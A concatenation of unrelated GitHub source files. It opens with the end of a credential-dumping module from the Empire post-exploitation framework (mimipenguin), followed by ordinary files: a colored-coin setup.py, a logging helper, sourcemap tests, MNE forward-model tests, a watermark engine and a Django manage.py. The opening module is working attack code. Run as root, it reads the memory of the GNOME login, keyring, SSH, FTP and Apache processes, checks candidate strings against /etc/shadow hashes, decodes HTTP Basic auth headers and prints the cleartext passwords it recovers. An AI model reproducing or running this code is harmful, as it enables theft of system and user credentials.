def get_linux_distribution():
try:
return platform.dist()[0].lower()
except IndexError:
return str()
def compute_hash(ctype, salt, password):
return crypt.crypt(password, '{}{}'.format(ctype, salt))
def strings(s, min_length=4):
strings_result = list()
result = str()
for c in s:
try:
c = chr(c)
except TypeError:
# In Python 2, c is already a chr
pass
if c in string.printable:
result += c
else:
if len(result) >= min_length:
strings_result.append(result)
result = str()
return strings_result
def dump_process(pid):
dump_result = bytes()
with open('/proc/{}/maps'.format(pid), 'r') as maps_file:
for l in maps_file.readlines():
memrange, attributes = l.split(' ')[:2]
if attributes.startswith('r'):
memrange_start, memrange_stop = [
int(x, 16) for x in memrange.split('-')]
memrange_size = memrange_stop - memrange_start
with open('/proc/{}/mem'.format(pid), 'rb') as mem_file:
try:
mem_file.seek(memrange_start)
dump_result += mem_file.read(memrange_size)
except (OSError, ValueError, IOError, OverflowError):
pass
return dump_result
def find_pid(process_name):
pids = list()
for pid in os.listdir('/proc'):
try:
with open('/proc/{}/cmdline'.format(pid), 'rb') as cmdline_file:
if process_name in cmdline_file.read().decode():
pids.append(pid)
except IOError:
continue
return pids
class PasswordFinder:
_hash_re = r'^\$.\$.+$'
def __init__(self):
self._potential_passwords = list()
self._strings_dump = list()
self._found_hashes = list()
def _dump_target_processes(self):
target_pids = list()
for target_process in self._target_processes:
target_pids += find_pid(target_process)
for target_pid in target_pids:
self._strings_dump += strings(dump_process(target_pid))
def _find_hash(self):
for s in self._strings_dump:
if re.match(PasswordFinder._hash_re, s):
self._found_hashes.append(s)
def _find_potential_passwords(self):
for needle in self._needles:
needle_indexes = [i for i, s in enumerate(self._strings_dump)
if re.search(needle, s)]
for needle_index in needle_indexes:
self._potential_passwords += self._strings_dump[
needle_index - 10:needle_index + 10]
self._potential_passwords = list(set(self._potential_passwords))
def _try_potential_passwords(self):
valid_passwords = list()
found_hashes = list()
pw_hash_to_user = dict()
if self._found_hashes:
found_hashes = self._found_hashes
with open('/etc/shadow', 'r') as f:
for l in f.readlines():
user, pw_hash = l.split(':')[:2]
if not re.match(PasswordFinder._hash_re, pw_hash):
continue
found_hashes.append(pw_hash)
pw_hash_to_user[pw_hash] = user
found_hashes = list(set(found_hashes))
for found_hash in found_hashes:
ctype = found_hash[:3]
salt = found_hash.split('$')[2]
for potential_password in self._potential_passwords:
potential_hash = compute_hash(ctype, salt, potential_password)
if potential_hash == found_hash:
try:
valid_passwords.append(
(pw_hash_to_user[found_hash], potential_password))
except KeyError:
valid_passwords.append(
('<unknown user>', potential_password))
return valid_passwords
def dump_passwords(self):
self._dump_target_processes()
self._find_hash()
self._find_potential_passwords()
return self._try_potential_passwords()
class GdmPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - GNOME]'
self._target_processes = ['gdm-password']
self._needles = ['^_pammodutil_getpwnam_root_1$',
'^gkr_system_authtok$']
class GnomeKeyringPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - GNOME]'
self._target_processes = ['gnome-keyring-daemon']
self._needles = [r'^.+libgck\-1\.so\.0$', r'libgcrypt\.so\..+$']
class VsftpdPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - VSFTPD]'
self._target_processes = ['vsftpd']
self._needles = [
r'^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$']
class SshdPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - SSH]'
self._target_processes = ['sshd:']
self._needles = [r'^sudo.+']
class ApachePasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[HTTP BASIC - APACHE2]'
self._target_processes = ['apache2']
self._needles = [r'^Authorization: Basic.+']
def _try_potential_passwords(self):
valid_passwords = list()
for potential_password in self._potential_passwords:
            try:
                potential_password = base64.b64decode(potential_password)
            except (binascii.Error, TypeError):
                # Python 3 raises binascii.Error, Python 2 wraps it in TypeError
                continue
            else:
                try:
                    # positional maxsplit works on Python 2 and 3; a missing
                    # ':' (or a bytes/str mismatch on Python 3) is skipped
                    user, password = potential_password.split(':', 1)
                    valid_passwords.append((user, password))
                except (ValueError, TypeError):
                    continue
return valid_passwords
def dump_passwords(self):
self._dump_target_processes()
self._find_potential_passwords()
return self._try_potential_passwords()
def main():
if not running_as_root():
        raise RuntimeError('mimipenguin should be run as root')
password_finders = list()
if find_pid('gdm-password'):
password_finders.append(GdmPasswordFinder())
if find_pid('gnome-keyring-daemon'):
password_finders.append(GnomeKeyringPasswordFinder())
if os.path.isfile('/etc/vsftpd.conf'):
password_finders.append(VsftpdPasswordFinder())
if os.path.isfile('/etc/ssh/sshd_config'):
password_finders.append(SshdPasswordFinder())
if os.path.isfile('/etc/apache2/apache2.conf'):
password_finders.append(ApachePasswordFinder())
for password_finder in password_finders:
for valid_passwords in password_finder.dump_passwords():
print('{}\t{}:{}'.format(password_finder._source_name,
valid_passwords[0], valid_passwords[1]))
if __name__ == '__main__':
main()
"""
return script
| {
"content_hash": "65e8df738a0d5a7b55a4bf3947805da5",
"timestamp": "",
"source": "github",
"line_count": 318,
"max_line_length": 113,
"avg_line_length": 31.5188679245283,
"alnum_prop": 0.5548239050184576,
"repo_name": "byt3bl33d3r/Empire",
"id": "4dd8ee6e50c189aaf284ea9c281718c16b342a79",
"size": "10023",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/modules/python/collection/linux/mimipenguin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "16998705"
},
{
"name": "Python",
"bytes": "2789955"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
import os
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.md')) as f:
README = f.read()
# FIXME: Also requires PyQt and SIP for the GUI, not available via pip
requires = [
'pycoin == 0.51',
'bunch',
'python-jsonrpc == 0.7.3',
#'python-bitcoinaddress = 0.2.2',
'python-bitcoinlib == 0.1.1',
'apigen == 0.1.6',
'web.py',
]
dependency_links = [
"https://github.com/petertodd/python-bitcoinlib/archive/v0.1.1.zip" +
"#egg=python-bitcoinlib",
]
setup(
name='ngcccbase',
version='0.0.10',
description='A flexible and modular base for colored coin software.',
long_description=README,
classifiers=[
"Programming Language :: Python",
],
url='https://github.com/bitcoinx/ngcccbase',
keywords='bitcoinx bitcoin coloredcoins',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
dependency_links=dependency_links,
test_suite="ngcccbase.tests",
)
| {
"content_hash": "88cded49341f95d45682f10f41d4a199",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 73,
"avg_line_length": 26.75,
"alnum_prop": 0.6532710280373831,
"repo_name": "chromaway/ngcccbase",
"id": "3c6c895d9fe944f850aaf3001e94d5e3bbc42fda",
"size": "1168",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "606"
},
{
"name": "Python",
"bytes": "465138"
},
{
"name": "Shell",
"bytes": "1753"
}
],
"symlink_target": ""
} |
import click
class LogLevel(object):
ERROR = 'ER'
WARN = 'WN'
OK = 'OK'
class Logger(object):
LEVEL_COLORS = {
LogLevel.ERROR: 'red',
LogLevel.WARN: 'yellow',
LogLevel.OK: 'green',
}
def __init__(self, module_name):
self._module_name = module_name
def log(self, level, message=''):
click.secho(self._format_message(level, message))
def warn(self, message):
self.log(LogLevel.WARN, message)
def error(self, message):
self.log(LogLevel.ERROR, message)
def prompt(self, message):
while True:
response = input(
self._format_message(LogLevel.WARN, message + ' [Y/N] ')
)
if response in {'Y', 'y'}:
return True
if response in {'N', 'n'}:
return False
def _format_message(self, level, message):
level_color = self.LEVEL_COLORS[level]
return '{} {} {}'.format(
click.style('[{}]'.format(level), fg=level_color),
click.style(self._module_name, fg='blue'),
click.style(message, fg=level_color)
)
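# Illustrative usage (not part of the original module):
#   log = Logger('backup')
#   log.warn('disk nearly full')        # yellow [WN] prefix, blue module name
#   if log.prompt('continue anyway?'):  # loops until Y/y or N/n is entered
#       log.log(LogLevel.OK, 'done')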
| {
"content_hash": "911d24b43aa58c071588ab32630d8ed6",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 72,
"avg_line_length": 25.77777777777778,
"alnum_prop": 0.5301724137931034,
"repo_name": "gregflynn/dotsanity",
"id": "ae7daf29863b3cf5632793af98e91acb10ca9072",
"size": "1160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sanity/logger.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Lua",
"bytes": "67603"
},
{
"name": "Python",
"bytes": "98571"
},
{
"name": "Shell",
"bytes": "20993"
},
{
"name": "Vim Script",
"bytes": "8073"
}
],
"symlink_target": ""
} |
try:
import unittest2 as unittest
except ImportError:
import unittest
import sourcemap
import json
class IntegrationTestCase(unittest.TestCase):
def get_fixtures(self, base):
source = open('tests/fixtures/%s.js' % base).read()
minified = open('tests/fixtures/%s.min.js' % base).read()
min_map = open('tests/fixtures/%s.min.map' % base).read()
return source, minified, min_map
def test_jquery(self):
source, minified, min_map = self.get_fixtures('jquery')
source_lines = source.splitlines()
assert sourcemap.discover(minified) == 'jquery.min.map'
index = sourcemap.loads(min_map)
assert index.raw == json.loads(min_map)
for token in index:
# Ignore tokens that are None.
# There's no simple way to verify they're correct
if token.name is None:
continue
source_line = source_lines[token.src_line]
start = token.src_col
end = start + len(token.name)
substring = source_line[start:end]
# jQuery's sourcemap has a few tokens that are identified
# incorrectly.
# For example, they have a token for 'embed', and
# it maps to '"embe', which is wrong. This only happened
            # for a few strings, so we ignore them
if substring[0] == '"':
continue
assert token.name == substring
def test_coolstuff(self):
source, minified, min_map = self.get_fixtures('coolstuff')
source_lines = source.splitlines()
assert sourcemap.discover(minified) == 'tests/fixtures/coolstuff.min.map'
index = sourcemap.loads(min_map)
assert index.raw == json.loads(min_map)
for token in index:
if token.name is None:
continue
source_line = source_lines[token.src_line]
start = token.src_col
end = start + len(token.name)
substring = source_line[start:end]
assert token.name == substring
def test_unicode_names(self):
_, _, min_map = self.get_fixtures('unicode')
# This shouldn't blow up
sourcemap.loads(min_map)
| {
"content_hash": "211192db562139719999f83aac9349c1",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 81,
"avg_line_length": 33.47761194029851,
"alnum_prop": 0.5862683905483728,
"repo_name": "mattrobenolt/python-sourcemap",
"id": "87550764e4fdbe406aea5beb453b2a8a99fda953",
"size": "2243",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_integration.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "154"
},
{
"name": "Python",
"bytes": "219037"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from itertools import product
import os
import os.path as op
import warnings
from nose.tools import assert_raises, assert_true
import numpy as np
from numpy.testing import (assert_equal, assert_allclose)
from mne.datasets import testing
from mne.io import read_raw_fif, read_raw_kit, read_raw_bti, read_info
from mne.io.constants import FIFF
from mne import (read_forward_solution, make_forward_solution,
convert_forward_solution, setup_volume_source_space,
read_source_spaces, make_sphere_model,
pick_types_forward, pick_info, pick_types, Transform,
read_evokeds, read_cov, read_dipole)
from mne.utils import (requires_mne, requires_nibabel, _TempDir,
run_tests_if_main, slow_test, run_subprocess)
from mne.forward._make_forward import _create_meg_coils, make_forward_dipole
from mne.forward._compute_forward import _magnetic_dipole_field_vec
from mne.forward import Forward, _do_forward_solution
from mne.dipole import Dipole, fit_dipole
from mne.simulation import simulate_evoked
from mne.source_estimate import VolSourceEstimate
from mne.source_space import (get_volume_labels_from_aseg,
_compare_source_spaces, setup_source_space)
data_path = testing.data_path(download=False)
fname_meeg = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-meg-eeg-oct-4-fwd.fif')
fname_raw = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data',
'test_raw.fif')
fname_evo = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-ave.fif')
fname_cov = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-cov.fif')
fname_dip = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_set1.dip')
fname_trans = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-trans.fif')
subjects_dir = os.path.join(data_path, 'subjects')
fname_src = op.join(subjects_dir, 'sample', 'bem', 'sample-oct-4-src.fif')
fname_bem = op.join(subjects_dir, 'sample', 'bem',
'sample-1280-1280-1280-bem-sol.fif')
fname_aseg = op.join(subjects_dir, 'sample', 'mri', 'aseg.mgz')
fname_bem_meg = op.join(subjects_dir, 'sample', 'bem',
'sample-1280-bem-sol.fif')
def _compare_forwards(fwd, fwd_py, n_sensors, n_src,
meg_rtol=1e-4, meg_atol=1e-9,
eeg_rtol=1e-3, eeg_atol=1e-3):
"""Test forwards."""
# check source spaces
assert_equal(len(fwd['src']), len(fwd_py['src']))
_compare_source_spaces(fwd['src'], fwd_py['src'], mode='approx')
for surf_ori, force_fixed in product([False, True], [False, True]):
# use copy here to leave our originals unmodified
fwd = convert_forward_solution(fwd, surf_ori, force_fixed,
copy=True)
fwd_py = convert_forward_solution(fwd_py, surf_ori, force_fixed,
copy=True)
check_src = n_src // 3 if force_fixed else n_src
for key in ('nchan', 'source_rr', 'source_ori',
'surf_ori', 'coord_frame', 'nsource'):
assert_allclose(fwd_py[key], fwd[key], rtol=1e-4, atol=1e-7,
err_msg=key)
# In surf_ori=True only Z matters for source_nn
if surf_ori and not force_fixed:
ori_sl = slice(2, None, 3)
else:
ori_sl = slice(None)
assert_allclose(fwd_py['source_nn'][ori_sl], fwd['source_nn'][ori_sl],
rtol=1e-4, atol=1e-6)
assert_allclose(fwd_py['mri_head_t']['trans'],
fwd['mri_head_t']['trans'], rtol=1e-5, atol=1e-8)
assert_equal(fwd_py['sol']['data'].shape, (n_sensors, check_src))
assert_equal(len(fwd['sol']['row_names']), n_sensors)
assert_equal(len(fwd_py['sol']['row_names']), n_sensors)
# check MEG
assert_allclose(fwd['sol']['data'][:306, ori_sl],
fwd_py['sol']['data'][:306, ori_sl],
rtol=meg_rtol, atol=meg_atol,
err_msg='MEG mismatch')
# check EEG
if fwd['sol']['data'].shape[0] > 306:
assert_allclose(fwd['sol']['data'][306:, ori_sl],
fwd_py['sol']['data'][306:, ori_sl],
rtol=eeg_rtol, atol=eeg_atol,
err_msg='EEG mismatch')
def test_magnetic_dipole():
"""Test basic magnetic dipole forward calculation."""
trans = Transform('mri', 'head')
info = read_info(fname_raw)
picks = pick_types(info, meg=True, eeg=False, exclude=[])
info = pick_info(info, picks[:12])
coils = _create_meg_coils(info['chs'], 'normal', trans)
# magnetic dipole at device origin
r0 = np.array([0., 13., -6.])
for ch, coil in zip(info['chs'], coils):
rr = (ch['loc'][:3] + r0) / 2.
far_fwd = _magnetic_dipole_field_vec(r0[np.newaxis, :], [coil])
near_fwd = _magnetic_dipole_field_vec(rr[np.newaxis, :], [coil])
ratio = 8. if ch['ch_name'][-1] == '1' else 16. # grad vs mag
assert_allclose(np.median(near_fwd / far_fwd), ratio, atol=1e-1)
@testing.requires_testing_data
@requires_mne
def test_make_forward_solution_kit():
"""Test making fwd using KIT, BTI, and CTF (compensated) files."""
kit_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'kit',
'tests', 'data')
sqd_path = op.join(kit_dir, 'test.sqd')
mrk_path = op.join(kit_dir, 'test_mrk.sqd')
elp_path = op.join(kit_dir, 'test_elp.txt')
hsp_path = op.join(kit_dir, 'test_hsp.txt')
trans_path = op.join(kit_dir, 'trans-sample.fif')
fname_kit_raw = op.join(kit_dir, 'test_bin_raw.fif')
bti_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'bti',
'tests', 'data')
bti_pdf = op.join(bti_dir, 'test_pdf_linux')
bti_config = op.join(bti_dir, 'test_config_linux')
bti_hs = op.join(bti_dir, 'test_hs_linux')
fname_bti_raw = op.join(bti_dir, 'exported4D_linux_raw.fif')
fname_ctf_raw = op.join(op.dirname(__file__), '..', '..', 'io', 'tests',
'data', 'test_ctf_comp_raw.fif')
# first set up a small testing source space
temp_dir = _TempDir()
fname_src_small = op.join(temp_dir, 'sample-oct-2-src.fif')
src = setup_source_space('sample', fname_src_small, 'oct2',
subjects_dir=subjects_dir, add_dist=False)
n_src = 108 # this is the resulting # of verts in fwd
# first use mne-C: convert file, make forward solution
fwd = _do_forward_solution('sample', fname_kit_raw, src=fname_src_small,
bem=fname_bem_meg, mri=trans_path,
eeg=False, meg=True, subjects_dir=subjects_dir)
assert_true(isinstance(fwd, Forward))
# now let's use python with the same raw file
fwd_py = make_forward_solution(fname_kit_raw, trans_path, src,
fname_bem_meg, eeg=False, meg=True)
_compare_forwards(fwd, fwd_py, 157, n_src)
assert_true(isinstance(fwd_py, Forward))
# now let's use mne-python all the way
raw_py = read_raw_kit(sqd_path, mrk_path, elp_path, hsp_path)
# without ignore_ref=True, this should throw an error:
assert_raises(NotImplementedError, make_forward_solution, raw_py.info,
src=src, eeg=False, meg=True,
bem=fname_bem_meg, trans=trans_path)
# check that asking for eeg channels (even if they don't exist) is handled
meg_only_info = pick_info(raw_py.info, pick_types(raw_py.info, meg=True,
eeg=False))
fwd_py = make_forward_solution(meg_only_info, src=src, meg=True, eeg=True,
bem=fname_bem_meg, trans=trans_path,
ignore_ref=True)
_compare_forwards(fwd, fwd_py, 157, n_src,
meg_rtol=1e-3, meg_atol=1e-7)
# BTI python end-to-end versus C
fwd = _do_forward_solution('sample', fname_bti_raw, src=fname_src_small,
bem=fname_bem_meg, mri=trans_path,
eeg=False, meg=True, subjects_dir=subjects_dir)
with warnings.catch_warnings(record=True): # weight tables
raw_py = read_raw_bti(bti_pdf, bti_config, bti_hs, preload=False)
fwd_py = make_forward_solution(raw_py.info, src=src, eeg=False, meg=True,
bem=fname_bem_meg, trans=trans_path)
_compare_forwards(fwd, fwd_py, 248, n_src)
# now let's test CTF w/compensation
fwd_py = make_forward_solution(fname_ctf_raw, fname_trans, src,
fname_bem_meg, eeg=False, meg=True)
fwd = _do_forward_solution('sample', fname_ctf_raw, mri=fname_trans,
src=fname_src_small, bem=fname_bem_meg,
eeg=False, meg=True, subjects_dir=subjects_dir)
_compare_forwards(fwd, fwd_py, 274, n_src)
# CTF with compensation changed in python
ctf_raw = read_raw_fif(fname_ctf_raw)
ctf_raw.apply_gradient_compensation(2)
fwd_py = make_forward_solution(ctf_raw.info, fname_trans, src,
fname_bem_meg, eeg=False, meg=True)
with warnings.catch_warnings(record=True):
fwd = _do_forward_solution('sample', ctf_raw, mri=fname_trans,
src=fname_src_small, bem=fname_bem_meg,
eeg=False, meg=True,
subjects_dir=subjects_dir)
_compare_forwards(fwd, fwd_py, 274, n_src)
@slow_test
@testing.requires_testing_data
def test_make_forward_solution():
"""Test making M-EEG forward solution from python."""
fwd_py = make_forward_solution(fname_raw, fname_trans, fname_src,
fname_bem, mindist=5.0, eeg=True, meg=True)
assert_true(isinstance(fwd_py, Forward))
fwd = read_forward_solution(fname_meeg)
assert_true(isinstance(fwd, Forward))
_compare_forwards(fwd, fwd_py, 366, 1494, meg_rtol=1e-3)
@testing.requires_testing_data
@requires_mne
def test_make_forward_solution_sphere():
"""Test making a forward solution with a sphere model."""
temp_dir = _TempDir()
fname_src_small = op.join(temp_dir, 'sample-oct-2-src.fif')
src = setup_source_space('sample', fname_src_small, 'oct2',
subjects_dir=subjects_dir, add_dist=False)
out_name = op.join(temp_dir, 'tmp-fwd.fif')
run_subprocess(['mne_forward_solution', '--meg', '--eeg',
'--meas', fname_raw, '--src', fname_src_small,
'--mri', fname_trans, '--fwd', out_name])
fwd = read_forward_solution(out_name)
sphere = make_sphere_model(verbose=True)
fwd_py = make_forward_solution(fname_raw, fname_trans, src, sphere,
meg=True, eeg=True, verbose=True)
_compare_forwards(fwd, fwd_py, 366, 108,
meg_rtol=5e-1, meg_atol=1e-6,
eeg_rtol=5e-1, eeg_atol=5e-1)
# Since the above is pretty lax, let's check a different way
for meg, eeg in zip([True, False], [False, True]):
fwd_ = pick_types_forward(fwd, meg=meg, eeg=eeg)
        fwd_py_ = pick_types_forward(fwd_py, meg=meg, eeg=eeg)
assert_allclose(np.corrcoef(fwd_['sol']['data'].ravel(),
fwd_py_['sol']['data'].ravel())[0, 1],
1.0, rtol=1e-3)
@slow_test
@testing.requires_testing_data
@requires_nibabel(False)
def test_forward_mixed_source_space():
"""Test making the forward solution for a mixed source space."""
temp_dir = _TempDir()
# get the surface source space
surf = read_source_spaces(fname_src)
# setup two volume source spaces
label_names = get_volume_labels_from_aseg(fname_aseg)
vol_labels = [label_names[int(np.random.rand() * len(label_names))]
for _ in range(2)]
vol1 = setup_volume_source_space('sample', fname=None, pos=20.,
mri=fname_aseg,
volume_label=vol_labels[0],
add_interpolator=False)
vol2 = setup_volume_source_space('sample', fname=None, pos=20.,
mri=fname_aseg,
volume_label=vol_labels[1],
add_interpolator=False)
# merge surfaces and volume
src = surf + vol1 + vol2
# calculate forward solution
fwd = make_forward_solution(fname_raw, fname_trans, src, fname_bem, None)
assert_true(repr(fwd))
# extract source spaces
src_from_fwd = fwd['src']
# get the coordinate frame of each source space
coord_frames = np.array([s['coord_frame'] for s in src_from_fwd])
# assert that all source spaces are in head coordinates
assert_true((coord_frames == FIFF.FIFFV_COORD_HEAD).all())
# run tests for SourceSpaces.export_volume
fname_img = op.join(temp_dir, 'temp-image.mgz')
# head coordinates and mri_resolution, but trans file
assert_raises(ValueError, src_from_fwd.export_volume, fname_img,
mri_resolution=True, trans=None)
# head coordinates and mri_resolution, but wrong trans file
vox_mri_t = vol1[0]['vox_mri_t']
assert_raises(ValueError, src_from_fwd.export_volume, fname_img,
mri_resolution=True, trans=vox_mri_t)
@slow_test
@testing.requires_testing_data
def test_make_forward_dipole():
"""Test forward-projecting dipoles."""
rng = np.random.RandomState(0)
evoked = read_evokeds(fname_evo)[0]
cov = read_cov(fname_cov)
dip_c = read_dipole(fname_dip)
# Only use magnetometers for speed!
picks = pick_types(evoked.info, meg='mag', eeg=False)
evoked.pick_channels([evoked.ch_names[p] for p in picks])
info = evoked.info
# Make new Dipole object with n_test_dipoles picked from the dipoles
# in the test dataset.
n_test_dipoles = 3 # minimum 3 needed to get uneven sampling in time
dipsel = np.sort(rng.permutation(np.arange(len(dip_c)))[:n_test_dipoles])
dip_test = Dipole(times=dip_c.times[dipsel],
pos=dip_c.pos[dipsel],
amplitude=dip_c.amplitude[dipsel],
ori=dip_c.ori[dipsel],
gof=dip_c.gof[dipsel])
sphere = make_sphere_model(head_radius=0.1)
# Warning emitted due to uneven sampling in time
with warnings.catch_warnings(record=True) as w:
fwd, stc = make_forward_dipole(dip_test, sphere, info,
trans=fname_trans)
assert_true(issubclass(w[-1].category, RuntimeWarning))
# stc is list of VolSourceEstimate's
assert_true(isinstance(stc, list))
for nd in range(n_test_dipoles):
assert_true(isinstance(stc[nd], VolSourceEstimate))
# Now simulate evoked responses for each of the test dipoles,
# and fit dipoles to them (sphere model, MEG and EEG)
times, pos, amplitude, ori, gof = [], [], [], [], []
snr = 20. # add a tiny amount of noise to the simulated evokeds
for s in stc:
evo_test = simulate_evoked(fwd, s, info, cov,
snr=snr, random_state=rng)
# evo_test.add_proj(make_eeg_average_ref_proj(evo_test.info))
dfit, resid = fit_dipole(evo_test, cov, sphere, None)
times += dfit.times.tolist()
pos += dfit.pos.tolist()
amplitude += dfit.amplitude.tolist()
ori += dfit.ori.tolist()
gof += dfit.gof.tolist()
# Create a new Dipole object with the dipole fits
dip_fit = Dipole(times, pos, amplitude, ori, gof)
# check that true (test) dipoles and fits are "close"
# cf. mne/tests/test_dipole.py
diff = dip_test.pos - dip_fit.pos
corr = np.corrcoef(dip_test.pos.ravel(), dip_fit.pos.ravel())[0, 1]
dist = np.sqrt(np.mean(np.sum(diff * diff, axis=1)))
gc_dist = 180 / np.pi * \
np.mean(np.arccos(np.sum(dip_test.ori * dip_fit.ori, axis=1)))
amp_err = np.sqrt(np.mean((dip_test.amplitude - dip_fit.amplitude) ** 2))
# Make sure each coordinate is close to reference
# NB tolerance should be set relative to snr of simulated evoked!
assert_allclose(dip_fit.pos, dip_test.pos, rtol=0, atol=1e-2,
err_msg='position mismatch')
assert_true(dist < 1e-2, 'dist: %s' % dist) # within 1 cm
assert_true(corr > 1 - 1e-2, 'corr: %s' % corr)
assert_true(gc_dist < 20, 'gc_dist: %s' % gc_dist) # less than 20 degrees
assert_true(amp_err < 10e-9, 'amp_err: %s' % amp_err) # within 10 nAm
# Make sure rejection works with BEM: one dipole at z=1m
# NB _make_forward.py:_prepare_for_forward will raise a RuntimeError
# if no points are left after min_dist exclusions, hence 2 dips here!
dip_outside = Dipole(times=[0., 0.001],
pos=[[0., 0., 1.0], [0., 0., 0.040]],
amplitude=[100e-9, 100e-9],
ori=[[1., 0., 0.], [1., 0., 0.]], gof=1)
assert_raises(ValueError, make_forward_dipole, dip_outside, fname_bem,
info, fname_trans)
# if we get this far, can safely assume the code works with BEMs too
# -> use sphere again below for speed
# Now make an evenly sampled set of dipoles, some simultaneous,
# should return a VolSourceEstimate regardless
times = [0., 0., 0., 0.001, 0.001, 0.002]
pos = np.random.rand(6, 3) * 0.020 + \
np.array([0., 0., 0.040])[np.newaxis, :]
amplitude = np.random.rand(6) * 100e-9
ori = np.eye(6, 3) + np.eye(6, 3, -3)
gof = np.arange(len(times)) / len(times) # arbitrary
dip_even_samp = Dipole(times, pos, amplitude, ori, gof)
fwd, stc = make_forward_dipole(dip_even_samp, sphere, info,
trans=fname_trans)
    assert_true(isinstance(stc, VolSourceEstimate))
assert_allclose(stc.times, np.arange(0., 0.003, 0.001))
run_tests_if_main()
| {
"content_hash": "049c8d5917c736ca1fbe63de42e947bd",
"timestamp": "",
"source": "github",
"line_count": 397,
"max_line_length": 79,
"avg_line_length": 45.931989924433246,
"alnum_prop": 0.5861255826706883,
"repo_name": "nicproulx/mne-python",
"id": "2c7e0a88b8dc95000141ecd0042ab10f0f42b48b",
"size": "18235",
"binary": false,
"copies": "2",
"ref": "refs/heads/placeholder",
"path": "mne/forward/tests/test_make_forward.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Csound Document",
"bytes": "69806"
},
{
"name": "Makefile",
"bytes": "3723"
},
{
"name": "Python",
"bytes": "5866703"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
} |
from sorl.thumbnail.engines.pil_engine import Engine as PILEngine
try:
from PIL import Image, ImageEnhance
except ImportError:
import Image
import ImageEnhance
from .base import WatermarkEngineBase
class Engine(WatermarkEngineBase, PILEngine):
"""PIL based thumbnailing engine with watermark support."""
name = "PIL"
def _watermark(
self, image, watermark_path, opacity, size, position_str, img_format
):
        # Open the watermark through an explicit file handle and work on a
        # copy to avoid a confirmed Pillow resource-leak bug:
        # https://github.com/python-pillow/Pillow/issues/835
with open(watermark_path, "rb") as image_file:
with Image.open(image_file) as pil_watermark:
watermark = pil_watermark.copy()
if opacity < 1:
watermark = self._reduce_opacity(watermark, opacity)
if image.mode != "RGBA":
image = image.convert("RGBA")
# create a transparent layer the size of the image and draw the
# watermark in that layer.
if not size:
mark_size = watermark.size
else:
mark_size = self._get_new_watermark_size(size, watermark.size)
options = {"crop": "center", "upscale": mark_size > watermark.size}
watermark = self.scale(watermark, mark_size, options)
watermark = self.crop(watermark, mark_size, options)
layer = Image.new("RGBA", image.size, (0, 0, 0, 0))
if position_str == "tile":
for x_pos in range(0, image.size[0], watermark.size[0]):
for y_pos in range(0, image.size[1], watermark.size[1]):
layer.paste(watermark, (x_pos, y_pos))
else:
position = self._define_watermark_position(
position_str, image.size, mark_size
)
layer.paste(watermark, position)
del watermark
return Image.composite(layer, image, layer)
def _reduce_opacity(self, image, opacity):
if image.mode != "RGBA":
image = image.convert("RGBA")
alpha = image.split()[3]
alpha = ImageEnhance.Brightness(alpha).enhance(opacity)
image.putalpha(alpha)
return image
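# Typical wiring (sketch, not part of this file): sorl-thumbnail selects this
# engine through its THUMBNAIL_ENGINE setting, e.g.
#   THUMBNAIL_ENGINE = 'sorl_watermarker.engines.pil_engine.Engine'
# after which the watermark options are applied while thumbnails are built.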
| {
"content_hash": "288f72707f06e62d3d8431693a24627f",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 82,
"avg_line_length": 38.3448275862069,
"alnum_prop": 0.6061151079136691,
"repo_name": "originell/sorl-watermark",
"id": "e60c298e6fa12e881a1c98728d350f4c3a8c984b",
"size": "2224",
"binary": false,
"copies": "1",
"ref": "refs/heads/modernize-for-2020s",
"path": "sorl_watermarker/engines/pil_engine.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19341"
}
],
"symlink_target": ""
} |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "indaba.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| {
"content_hash": "406771d8ce0e4ef56846db870569088e",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 70,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7092511013215859,
"repo_name": "PyZim/indaba",
"id": "164d86f803ff0b05332c72727593dd889cc76718",
"size": "249",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manage.py",
